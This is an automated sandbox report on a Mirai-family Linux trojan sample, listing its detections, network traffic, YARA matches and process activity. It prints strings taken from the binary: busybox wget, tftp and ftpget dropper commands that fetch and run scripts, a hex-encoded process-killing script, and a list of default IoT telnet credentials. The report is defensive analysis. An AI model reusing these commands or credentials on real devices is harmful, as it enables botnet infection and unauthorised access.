Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nabx86.elf

Overview

General Information

Sample name:nabx86.elf
Analysis ID:1564348
MD5:8733d552de33f075fdd894d5b0a1ee79
SHA1:59034bb21b4584c420305fc4b85b17c3851dfaea
SHA256:65e2fac2aa0666a8c5ff244e1ef0f61119dc2dd9a76aa042a3fd30d9168f46cf
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1564348
Start date and time:2024-11-28 08:32:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nabx86.elf
Detection:MAL
Classification:mal68.troj.linELF@0/0@2/0
Command:/tmp/nabx86.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • nabx86.elf (PID: 6231, Parent: 6148, MD5: 8733d552de33f075fdd894d5b0a1ee79) Arguments: /tmp/nabx86.elf
  • dash New Fork (PID: 6238, Parent: 4335)
  • rm (PID: 6238, Parent: 4335, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93
  • dash New Fork (PID: 6239, Parent: 4335)
  • rm (PID: 6239, Parent: 4335, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93
  • cleanup
SourceRuleDescriptionAuthorStrings
nabx86.elfLinux_Trojan_Mirai_88de437funknownunknown
  • 0x4c62:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
nabx86.elfLinux_Trojan_Mirai_cc93863bunknownunknown
  • 0x5c49:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
nabx86.elfLinux_Trojan_Mirai_8aa7b5d3unknownunknown
  • 0x4c32:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
SourceRuleDescriptionAuthorStrings
6231.1.0000000008048000.0000000008052000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
  • 0x4c62:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6231.1.0000000008048000.0000000008052000.r-x.sdmpLinux_Trojan_Mirai_cc93863bunknownunknown
  • 0x5c49:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6231.1.0000000008048000.0000000008052000.r-x.sdmpLinux_Trojan_Mirai_8aa7b5d3unknownunknown
  • 0x4c32:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6233.1.0000000008048000.0000000008052000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
  • 0x4c62:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6233.1.0000000008048000.0000000008052000.r-x.sdmpLinux_Trojan_Mirai_cc93863bunknownunknown
  • 0x5c49:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
Click to see the 1 entries
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nabx86.elfReversingLabs: Detection: 39%
Source: nabx86.elfVirustotal: Detection: 33%Perma Link
Source: nabx86.elfJoe Sandbox ML: detected
Source: nabx86.elfString: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd sh .k/bin/busybox wget http:///curl.sh -o- | shThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

barindex
Source: global trafficTCP traffic: 154.213.187.249 ports 38241,1,2,3,4,8
Source: global trafficDNS traffic detected: malformed DNS query: netfags.geek. [malformed]
Source: global trafficTCP traffic: 192.168.2.23:35226 -> 154.213.187.249:38241
Source: unknownTCP traffic detected without corresponding DNS query: 33.27.234.208
Source: unknownTCP traffic detected without corresponding DNS query: 26.23.72.51
Source: unknownTCP traffic detected without corresponding DNS query: 78.207.14.235
Source: unknownTCP traffic detected without corresponding DNS query: 21.158.166.21
Source: unknownTCP traffic detected without corresponding DNS query: 53.101.36.246
Source: unknownTCP traffic detected without corresponding DNS query: 92.129.137.31
Source: unknownTCP traffic detected without corresponding DNS query: 222.254.241.91
Source: unknownTCP traffic detected without corresponding DNS query: 80.116.204.139
Source: unknownTCP traffic detected without corresponding DNS query: 22.61.25.146
Source: unknownTCP traffic detected without corresponding DNS query: 37.45.241.143
Source: unknownTCP traffic detected without corresponding DNS query: 124.119.186.70
Source: unknownTCP traffic detected without corresponding DNS query: 171.97.181.100
Source: unknownTCP traffic detected without corresponding DNS query: 132.192.214.206
Source: unknownTCP traffic detected without corresponding DNS query: 163.159.77.51
Source: unknownTCP traffic detected without corresponding DNS query: 191.139.116.231
Source: unknownTCP traffic detected without corresponding DNS query: 175.255.55.162
Source: unknownTCP traffic detected without corresponding DNS query: 112.83.133.68
Source: unknownTCP traffic detected without corresponding DNS query: 125.115.243.69
Source: unknownTCP traffic detected without corresponding DNS query: 80.25.46.198
Source: unknownTCP traffic detected without corresponding DNS query: 172.226.113.114
Source: unknownTCP traffic detected without corresponding DNS query: 33.27.234.208
Source: unknownTCP traffic detected without corresponding DNS query: 26.23.72.51
Source: unknownTCP traffic detected without corresponding DNS query: 21.158.166.21
Source: unknownTCP traffic detected without corresponding DNS query: 78.207.14.235
Source: unknownTCP traffic detected without corresponding DNS query: 92.129.137.31
Source: unknownTCP traffic detected without corresponding DNS query: 222.254.241.91
Source: unknownTCP traffic detected without corresponding DNS query: 22.61.25.146
Source: unknownTCP traffic detected without corresponding DNS query: 53.101.36.246
Source: unknownTCP traffic detected without corresponding DNS query: 37.45.241.143
Source: unknownTCP traffic detected without corresponding DNS query: 124.119.186.70
Source: unknownTCP traffic detected without corresponding DNS query: 80.116.204.139
Source: unknownTCP traffic detected without corresponding DNS query: 163.159.77.51
Source: unknownTCP traffic detected without corresponding DNS query: 112.83.133.68
Source: unknownTCP traffic detected without corresponding DNS query: 191.139.116.231
Source: unknownTCP traffic detected without corresponding DNS query: 132.192.214.206
Source: unknownTCP traffic detected without corresponding DNS query: 175.255.55.162
Source: unknownTCP traffic detected without corresponding DNS query: 171.97.181.100
Source: unknownTCP traffic detected without corresponding DNS query: 172.226.113.114
Source: unknownTCP traffic detected without corresponding DNS query: 125.115.243.69
Source: unknownTCP traffic detected without corresponding DNS query: 80.25.46.198
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 33.27.234.208
Source: unknownTCP traffic detected without corresponding DNS query: 26.23.72.51
Source: unknownTCP traffic detected without corresponding DNS query: 21.158.166.21
Source: unknownTCP traffic detected without corresponding DNS query: 78.207.14.235
Source: unknownTCP traffic detected without corresponding DNS query: 53.101.36.246
Source: unknownTCP traffic detected without corresponding DNS query: 92.129.137.31
Source: global trafficDNS traffic detected: DNS query: burnthe.libre
Source: global trafficDNS traffic detected: DNS query: netfags.geek. [malformed]
Source: nabx86.elfString found in binary or memory: http:///curl.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .dPon521rootZte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulthkipc2016unisheenFireituphslwificam5upjvbzdsystemzlxx.antslqxc12345xmhdipcicatch99founder88xirtam/*6.=_jat0talc0ntr0l4!7ujMko0adminjuantechipc71aroot12320080826admin123admin1234admin@123BrAhMoS@15GeNeXiS@19supportadmintelnetadminadmintelecomtelecomadminguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8tluafedbin20150602vstarcam2015supporte8ehomee8telnet
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sampleString containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd sh .k/bin/busybox wget http:///curl.sh -o- | shThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x
Source: ELF static info symbol of initial sample.symtab present: no
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: nabx86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6231.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6233.1.0000000008048000.0000000008052000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engineClassification label: mal68.troj.linELF@0/0@2/0
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6252/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6252/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6274/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6274/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6251/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6251/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6273/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6273/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6254/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6254/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6276/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6276/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6253/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6253/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6275/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6275/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6256/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6256/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6278/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6278/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6255/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6255/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6277/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6277/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6258/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6258/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6257/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6257/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6279/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6279/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6270/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6270/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6250/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6250/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6272/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6272/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6271/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6271/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6249/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6249/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6248/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6248/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6241/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6241/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6285/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6285/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6240/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6240/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6284/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6284/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6243/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6243/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6242/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6242/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6286/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6286/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6245/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6245/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6244/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6244/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6247/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6247/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6269/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6269/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6246/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6246/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6281/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6281/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6280/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6280/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6283/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6283/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6282/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6282/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6259/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6259/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6239/mapsJump to behavior
Source: /tmp/nabx86.elf (PID: 6234)File opened: /proc/6239/cmdlineJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2033/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1582/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2275/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1612/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1579/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1699/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1335/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1698/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2028/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1334/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1576/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2302/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/3236/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2025/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2146/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/912/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/759/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2307/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/918/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1594/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2285/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/2281/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1349/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1623/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/761/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/1622/statusJump to behavior
Source: /tmp/nabx86.elf (PID: 6233)File opened: /proc/884/statusJump to behavior
Source: /usr/bin/dash (PID: 6238)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93Jump to behavior
Source: /usr/bin/dash (PID: 6239)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.eKSbbk5iHH /tmp/tmp.cvRGYZm110 /tmp/tmp.bLMyMAed93Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
File Deletion
1
OS Credential Dumping
System Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
